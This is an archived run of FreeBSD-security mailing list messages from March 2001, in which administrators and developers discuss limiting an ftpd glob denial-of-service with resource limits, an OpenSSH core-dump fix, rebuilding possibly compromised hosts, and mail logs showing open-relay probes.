for <freeBSD-security@freeBSD.org>; Fri, 16 Mar 2001 12:48:12 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 7A22C66B25; Fri, 16 Mar 2001 12:48:08 -0800 (PST)
Date: Fri, 16 Mar 2001 12:48:08 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Ron 'The InSaNe One' Rosson <insane@lunatic.oneinsane.net>
Cc: freeBSD-security@freeBSD.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010316124808.B98989@mollari.cthul.hu>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu> <20010316071511.A46313@lunatic.oneinsane.net>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="Fba/0zbH8Xs+Fj9o"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316071511.A46313@lunatic.oneinsane.net>; from insane@lunatic.oneinsane.net on Fri, Mar 16, 2001 at 07:15:12AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--Fba/0zbH8Xs+Fj9o
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Fri, Mar 16, 2001 at 07:15:12AM -0800, Ron 'The InSaNe One' Rosson wrote:
> Kris Kennaway (kris@obsecurity.org) wrote:
> > On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > > 4.1 from Aug 10th is hurt by it.
> > > >
> > > > ---Mike
> > > >
> > >=20
> > > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses=
100%
> > > cpu and memory use grows until the kernel runs out of swap space and =
starts
> > > killing processes. This was an ftp connection with a regular usernam=
e and
> > > password, in an average home directory.
> >=20
> > I'm pretty sure (but haven't tested) that resource limits will prevent
> > this problem. Your ftpd shouldn't be using large amount of memory
> > under normal operating procedures, so you can set those to reasonable
> > values and not suffer any ill effects.
> >=20
> > Kris
>=20
> But, by default are the resource limits set properly to avoid this out
> of the box? Or does one have to make the mod themselves.
You have to tune resource limits as appropriate for your local
operating environment.
Kris
--Fba/0zbH8Xs+Fj9o
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6snwHWry0BWjoQKURAo1XAJ41taxJNIk40WyL0E75yWDW06DPTACfZovh
gbB3L8KuAEgdoNeNgqI74hA=
=rrM9
-----END PGP SIGNATURE-----
--Fba/0zbH8Xs+Fj9o--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 13: 2:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
by hub.freebsd.org (Postfix) with ESMTP id C8F8C37B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 13:02:40 -0800 (PST)
(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-213-168-72-106.netcologne.de [213.168.72.106])
by mr200.netcologne.de (Mirapoint)
with ESMTP id ACP85460;
Fri, 16 Mar 2001 22:02:38 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GL2RB49212;
Fri, 16 Mar 2001 22:02:27 +0100 (CET)
(envelope-from pherman@frenchfries.net)
Date: Fri, 16 Mar 2001 22:02:27 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: "ho-sang, yoon" <tsoi@xocah.holywar.net>
Cc: <freebsd-security@FreeBSD.ORG>,
Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>
Message-ID: <Pine.BSF.4.33.0103162158140.10083-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, 16 Mar 2001, ho-sang, yoon wrote:
> $ whoami
> ftp
> $ ulimit -a
> [...]
> data seg size (kbytes, -d) 524288
> stack size (kbytes, -s) 65536
> core file size (512-blocks, -c) 102400
> max memory size (kbytes, -m) 20480
> locked memory (kbytes, -l) 10240
> [...]
>
> ---top-----------------------------------------------------------------------
> PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
> 6379 root 55 0 33360K 33016K RUN 0:40 86.02% 84.67% ftpd
> [cut]
> -----------------------------------------------------------------------------
>
> I don't think that the resourse limit does effect on this matter.
> Or, am I something wrong?
I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
kicked in, but it didn't. However, what does work is setting the
"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
RLIMIT_DATA.
Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
I'm perusing through sys/vm now...
-Paul.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 13:17:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67])
by hub.freebsd.org (Postfix) with ESMTP id 37F1637B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 13:17:35 -0800 (PST)
(envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost)
by earth.backplane.com (8.11.2/8.9.3) id f2GLGm674347;
Fri, 16 Mar 2001 13:16:48 -0800 (PST)
(envelope-from dillon)
Date: Fri, 16 Mar 2001 13:16:48 -0800 (PST)
From: Matt Dillon <dillon@earth.backplane.com>
Message-Id: <200103162116.f2GLGm674347@earth.backplane.com>
To: Paul Herman <pherman@frenchfries.net>
Cc: "ho-sang, yoon" <tsoi@xocah.holywar.net>,
<freebsd-security@FreeBSD.ORG>, Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
References: <Pine.BSF.4.33.0103162158140.10083-100000@husten.security.at12.de>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
:>
:> I don't think that the resourse limit does effect on this matter.
:> Or, am I something wrong?
:
:I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
:kicked in, but it didn't. However, what does work is setting the
:"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
:RLIMIT_DATA.
:
:Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
:I'm perusing through sys/vm now...
:
:-Paul.
The 'datasize' limit (RLIMIT_DATA) only applies to malloc(). It does
not apply to mmap(). This is a known issue. In anycase, it would depend
on what ftpd uses. I would expect ftpd to use malloc() for internal
structures and perhaps mmap() (or sendfile()) when reading a file.
The 'memoryuse' limit (RLIMIT_RSS) only applies to the process'es
in-core size. If the process exceeds this value and the machine is
loaded down, the kernel will attempt to swap pages out to get the
process back within the limit. If the machine is mostly idle, the
kernel ignores this limit.
Currently we have no resource to limit mmap() use.
-Matt
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 17:28:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4])
by hub.freebsd.org (Postfix) with ESMTP id 662C437B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 17:28:08 -0800 (PST)
(envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost)
by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2H1Rfj30921;
Fri, 16 Mar 2001 20:27:41 -0500 (EST)
(envelope-from rsimmons@wlcg.com)
Date: Fri, 16 Mar 2001 20:27:37 -0500 (EST)
From: Rob Simmons <rsimmons@wlcg.com>
To: Anil Jangity <aj@entic.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
Message-ID: <Pine.BSF.4.33.0103162026510.30661-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
You can change the user that ftpd runs as in inetd.conf.
Robert Simmons
Systems Administrator
http://www.wlcg.com/
On Fri, 16 Mar 2001, Anil Jangity wrote:
> Kris/All,
>
> FTPD is run as root (atleast on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ball park figure for
> root would be...
>
> I looked in ftpd(8) for some way to make it run as another user (atleast
> after it starts up) but no luck.
>
> So, my question is, how do you propose we resource limit ftpd as you
> suggest via login.conf?
>
> Thanks
>
> Anil
>
> @ I'm pretty sure (but haven't tested) that resource limits will prevent
> @ this problem. Your ftpd shouldn't be using large amount of memory
> @ under normal operating procedures, so you can set those to reasonable
> @ values and not suffer any ill effects.
> @
> @ Kris
> @
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6sr2Nv8Bofna59hYRAulRAKC20qJDD9H8hSVmW0TUxrPggy2YZwCfcuPz
aCyNKaYxkf5yauK9UpD9UGQ=
=Utb5
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 18: 6:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from imo-m06.mx.aol.com (imo-m06.mx.aol.com [64.12.136.161])
by hub.freebsd.org (Postfix) with ESMTP id D780637B71A
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 18:06:49 -0800 (PST)
(envelope-from aykatsue@netscape.net)
Received: from aykatsue@netscape.net
by imo-m06.mx.aol.com (mail_out_v29.5.) id n.ef.110874e (16226)
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 21:06:42 -0500 (EST)
Received: from netscape.com (aimmail10.aim.aol.com [205.188.144.202]) by air-in02.mx.aol.com (v77_r1.21) with ESMTP; Fri, 16 Mar 2001 21:06:42 -0500
Date: Fri, 16 Mar 2001 21:07:10 -0500
From: aykatsue@netscape.net (Eric Estrella)
To: FreeBSD-security@freebsd.org
Subject: subscribe
Mime-Version: 1.0
Message-ID: <592F8E49.1A2894FF.0096C8D3@netscape.net>
X-Mailer: Franklin Webmailer 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
__________________________________________________________________
Get your own FREE, personal Netscape Webmail account today at http://webmail.netscape.com/
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 19:16:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20])
by hub.freebsd.org (Postfix) with SMTP id 4BE9B37B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 19:16:13 -0800 (PST)
(envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 10588 invoked by uid 0); 17 Mar 2001 03:16:11 -0000
Received: from pd950868c.dip.t-dialin.net (HELO speedy.gsinet) (217.80.134.140)
by mail.gmx.net (mp020-rz3) with SMTP; 17 Mar 2001 03:16:11 -0000
Received: (from sittig@localhost)
by speedy.gsinet (8.8.8/8.8.8) id VAA28585
for freebsd-security@FreeBSD.ORG; Fri, 16 Mar 2001 21:37:16 +0100
Date: Fri, 16 Mar 2001 21:37:16 +0100
From: Gerhard Sittig <Gerhard.Sittig@gmx.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316213716.D20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net> <Pine.BSF.4.33.0103161922120.9463-100000@husten.security.at12.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <Pine.BSF.4.33.0103161922120.9463-100000@husten.security.at12.de>; from pherman@frenchfries.net on Fri, Mar 16, 2001 at 07:34:22PM +0100
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 19:34 +0100, Paul Herman wrote:
>
> To bad a setusercontext() call couldn't be easily implimented
> inside of set[e]uid() (it's in -lutil not -lc). I see too many
> FreeBSD admins that believe that their proftpds and qmails are
> protected by the limits set in /etc/login.conf.
Well, the latter is recommended to be wrapped up in a
softlimit(1) invocation. And the former - as well as any other
program - could be treated the same.
If login.conf isn't easily applied one is still free to make use
of ports/sysutils/daemontools.
virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 23: 6:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222])
by hub.freebsd.org (Postfix) with ESMTP id 0C9EB37B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 23:06:50 -0800 (PST)
(envelope-from docs@mailer.progressive-comp.com)
Received: (from docs@localhost)
by mailer.progressive-comp.com with id CAA08229; Sat, 17 Mar 2001 02:06:06 -0500
Date: Sat, 17 Mar 2001 02:06:06 -0500
Message-Id: <200103170706.CAA08229@mailer.progressive-comp.com>
From: Hank Leininger <freebsd-security@progressive-comp.com>
Reply-To: Hank Leininger <hlein@progressive-comp.com>
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
X-Shameless-Plug: Check out http://marc.theaimsgroup.com/
X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com
X-Warning: Report any violation of list policy to abuse@progressive-comp.com
X-Posted-By: Hank Leininger <hlein@progressive-comp.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On 2001-03-16, Kris Kennaway <kris@obsecurity.org> wrote:
> Always be careful trusting the results of automated scanners, because
> they can never contain a database of ALL known vulnerabilities, so
> your system may have other problems than what's noted there. It may
> be useful as a backup to make sure you haven't missed anything,
> though.
[ I know Kris knows this, just pointing it out... ]
s/known//;
In particular, as other people have pointed out, if you have any reason to
think a box *might* have been compromised, it's not worth your time (if
your goal is to get on with life) to do anything but assume it *has* been
compromised, and start over. There are too many creative ways that an
attacker could have trojan'ed the box once they had free reign for you to
ever[*] be sure you've been thorough enough in checking the box out. Once
a box falls out of a known-good state, it can't really be put back without
starting over, or taking a big chance...
[*] A thorough forensic analysis could tell you that the box definitely has
been, or probably has not been, compromised. The level of certainty that
it hasn't been that you can achieve is directly proportional to how much
time (or money) you have to spend on the investigation. Sounds like you
have little of either, and don't feel like becoming a forensic expert for
the hell of it, so I'd suggest not trying to "prove" to yourself or anyone
else that the box(es) are safe, and just replace them/do the rolling
rebuilds as have been suggested here. Don't forget to take advantage of
this opportunity to remind management how much time and money, in the long
run, a proactive approach can save. :-P
--
Hank Leininger <hlein@progressive-comp.com>
I say we take off, nuke the site from orbit. Only way to be sure.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 2:40:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
by hub.freebsd.org (Postfix) with ESMTP id ADB0A37B719
for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 02:40:53 -0800 (PST)
(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-195-14-235-121.netcologne.de [195.14.235.121])
by mr200.netcologne.de (Mirapoint)
with ESMTP id ACQ21835;
Sat, 17 Mar 2001 11:40:45 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2HAebK56557;
Sat, 17 Mar 2001 11:40:37 +0100 (CET)
(envelope-from pherman@frenchfries.net)
Date: Sat, 17 Mar 2001 11:40:36 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: Gerhard Sittig <Gerhard.Sittig@gmx.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316213716.D20830@speedy.gsinet>
Message-ID: <Pine.BSF.4.33.0103170911190.10083-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, 16 Mar 2001, Gerhard Sittig wrote:
> > To bad a setusercontext() call couldn't be easily implimented
> > inside of set[e]uid() (it's in -lutil not -lc). I see too many
> > FreeBSD admins that believe that their proftpds and qmails are
> > protected by the limits set in /etc/login.conf.
>
> Well, the latter is recommended to be wrapped up in a
> softlimit(1) invocation. And the former - as well as any other
> program - could be treated the same.
>
> If login.conf isn't easily applied one is still free to make use
> of ports/sysutils/daemontools.
Yes, there are many solutions, most of which have already been posted.
Thing is, even if you created ports/sysutils/cluestick, many admins
would still intuitively believe that limits imposed by /etc/login.conf
apply to all processes.
The reality that only a select few daemons use /etc/login.conf is
admittedly counter-intuitive. Perhaps this is more of a job for
TrustedBSD's MAC policies, but it Would Be Nice if resource limits
were set along with (e)uid. What do others think?
Like I said, this could be done by wraping setusercontext() into
setuid(), but it starts to get yucky when mixing userland login_cap
functions with a system call. I'd be willing to come up with a patch
for this, if it weren't so darn ugly.
Would there be a cleaner way to do this?
-Paul.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 3: 6: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id 6DF1237B718
for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 03:05:58 -0800 (PST)
(envelope-from roam@ringworld.nanolink.com)
Received: (qmail 22363 invoked by uid 1000); 17 Mar 2001 11:05:15 -0000
Date: Sat, 17 Mar 2001 13:05:15 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Matt Dillon <dillon@earth.backplane.com>
Cc: Paul Herman <pherman@frenchfries.net>,
"ho-sang, yoon" <tsoi@xocah.holywar.net>,
freebsd-security@FreeBSD.ORG, Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010317130515.A20798@ringworld.oblivion.bg>
Mail-Followup-To: Matt Dillon <dillon@earth.backplane.com>,
Paul Herman <pherman@frenchfries.net>,
"ho-sang, yoon" <tsoi@xocah.holywar.net>,
freebsd-security@FreeBSD.ORG, Kris Kennaway <kris@obsecurity.org>
References: <Pine.BSF.4.33.0103162158140.10083-100000@husten.security.at12.de> <200103162116.f2GLGm674347@earth.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103162116.f2GLGm674347@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Mar 16, 2001 at 01:16:48PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 01:16:48PM -0800, Matt Dillon wrote:
> :>
> :> I don't think that the resourse limit does effect on this matter.
> :> Or, am I something wrong?
> :
> :I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
> :kicked in, but it didn't. However, what does work is setting the
> :"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
> :RLIMIT_DATA.
> :
> :Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
> :I'm perusing through sys/vm now...
> :
> :-Paul.
>
> The 'datasize' limit (RLIMIT_DATA) only applies to malloc(). It does
> not apply to mmap(). This is a known issue. In anycase, it would depend
> on what ftpd uses. I would expect ftpd to use malloc() for internal
> structures and perhaps mmap() (or sendfile()) when reading a file.
>
> The 'memoryuse' limit (RLIMIT_RSS) only applies to the process'es
> in-core size. If the process exceeds this value and the machine is
> loaded down, the kernel will attempt to swap pages out to get the
> process back within the limit. If the machine is mostly idle, the
> kernel ignores this limit.
>
> Currently we have no resource to limit mmap() use.
I think in this case it's important to limit exactly malloc(), and
definitely NOT mmap(). It's glob(3) that's causing this particular
DoS, and it (or, in particular, lib/libc/gen/glob.c's globextend())
uses malloc(). We definitely do not want to limit the maximum filesize
that ftpd can transfer - which uses sendfile(); I do not know where
sendfile() gets its limits from, but being a syscall, it should
not be dependent on RLIMIT_DATA. (well, OK, you probably know what I mean :)
G'luck,
Peter
--
This sentence no verb.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 5:44:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128])
by hub.freebsd.org (Postfix) with ESMTP id F1A7437B71A
for <freebsd-security@freebsd.org>; Sat, 17 Mar 2001 05:44:24 -0800 (PST)
(envelope-from snow@teardrop.org)
Received: (from snow@localhost)
by silver.teardrop.org (8.11.2/8.11.1) id f2HDiLd72890;
Sat, 17 Mar 2001 08:44:21 -0500 (EST)
(envelope-from snow@teardrop.org)
Date: Sat, 17 Mar 2001 08:44:21 -0500
From: James Snow <snow@teardrop.org>
To: Peter Pentchev <roam@orbitel.bg>, freebsd-security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010317084421.A72802@teardrop.org>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316203238.A8245@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:32:38PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote:
>
> I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
> committed a similar fix earlier today :)
Cool. Although, I haven't seen it show up in my source tree yet.
Do you know what the fix was?
-Snow
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 6:12:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id 9238937B719
for <freebsd-security@freebsd.org>; Sat, 17 Mar 2001 06:12:30 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 86420 invoked by uid 1000); 17 Mar 2001 14:11:24 -0000
Date: Sat, 17 Mar 2001 16:11:23 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: James Snow <snow@teardrop.org>
Cc: freebsd-security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010317161122.B20798@ringworld.oblivion.bg>
Mail-Followup-To: James Snow <snow@teardrop.org>,
freebsd-security@freebsd.org
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg> <20010317084421.A72802@teardrop.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010317084421.A72802@teardrop.org>; from snow@teardrop.org on Sat, Mar 17, 2001 at 08:44:21AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Sat, Mar 17, 2001 at 08:44:21AM -0500, James Snow wrote:
> On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote:
> >
> > I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
> > committed a similar fix earlier today :)
>
> Cool. Although, I haven't seen it show up in my source tree yet.
>
> Do you know what the fix was?
It has still not shown up in -stable. -current has the fix:
http://www.FreeBSD.org/cgi/cvsweb.cgi/src/crypto/openssh/auth2.c
Take a look at rev. 1.10.
G'luck,
Peter
--
No language can express every thought unambiguously, least of all this one.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 8:21:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id 23D9937B718
for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 08:21:14 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id RAA73701;
Sat, 17 Mar 2001 17:21:12 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: Per Christian Henden <perchrh@stud.math.ntnu.no>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: weird error messages (at least I don't understand them)
References: <Pine.GSO.4.33.0103161022470.28592-100000@lastebil.math.ntnu.no>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 17 Mar 2001 17:21:11 +0100
In-Reply-To: Per Christian Henden's message of "Fri, 16 Mar 2001 10:34:41 +0100 (MET)"
Message-ID: <xzphf0scqo8.fsf@flood.ping.uio.no>
Lines: 24
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Per Christian Henden <perchrh@stud.math.ntnu.no> writes:
> These entries (or something similar) also appears fairly frequently
> (I replaced my real dns-name with "my.hostname.domain")
>
> Checking for rejected mail hosts:
> 5 malvix.hist.no
> 2 my.hostname.domain
> 2 malvix.hist.no@my.hostname.domain
> 1 <malvix.hist.no!kan2na
> 1 <kan2na@
> 1 <kan2na%malvix.hist.no
> 1 <kan2na
> 1 <@myhostname.domain:kan2na@malvix.hist.no
>
> This looks kinda suspicous to me, what could it mean?
It means malvix.hist.no is looking for an open relay to spam through.
If I were you, I'd check /var/log/maillog* for occurrences of
'malvix', and send those to abuse@hist.no (or ask the admins at NTNU
if they know who's in charge of HIST)
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sat Mar 17 12:16:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20])
by hub.freebsd.org (Postfix) with SMTP id A817937B718
for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 12:16:00 -0800 (PST)
(envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 8013 invoked by uid 0); 17 Mar 2001 20:15:59 -0000
Received: from pd950883e.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.62)
by mail.gmx.net (mail05) with SMTP; 17 Mar 2001 20:15:59 -0000
Received: (from sittig@localhost)
by speedy.gsinet (8.8.8/8.8.8) id RAA30352
for freebsd-security@FreeBSD.ORG; Sat, 17 Mar 2001 17:46:41 +0100
Date: Sat, 17 Mar 2001 17:46:41 +0100
From: Gerhard Sittig <Gerhard.Sittig@gmx.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010317174640.F20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <20010316213716.D20830@speedy.gsinet> <Pine.BSF.4.33.0103170911190.10083-100000@husten.security.at12.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <Pine.BSF.4.33.0103170911190.10083-100000@husten.security.at12.de>; from pherman@frenchfries.net on Sat, Mar 17, 2001 at 11:40:36AM +0100
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Sat, Mar 17, 2001 at 11:40 +0100, Paul Herman wrote:
>
> The reality that only a select few daemons use /etc/login.conf
> is admittedly counter-intuitive. Perhaps this is more of a job
> for TrustedBSD's MAC policies, but it Would Be Nice if resource
> limits were set along with (e)uid. What do others think?
>
> Like I said, this could be done by wraping setusercontext()
> into setuid(), but it starts to get yucky when mixing userland
> login_cap functions with a system call. I'd be willing to come
> up with a patch for this, if it weren't so darn ugly.
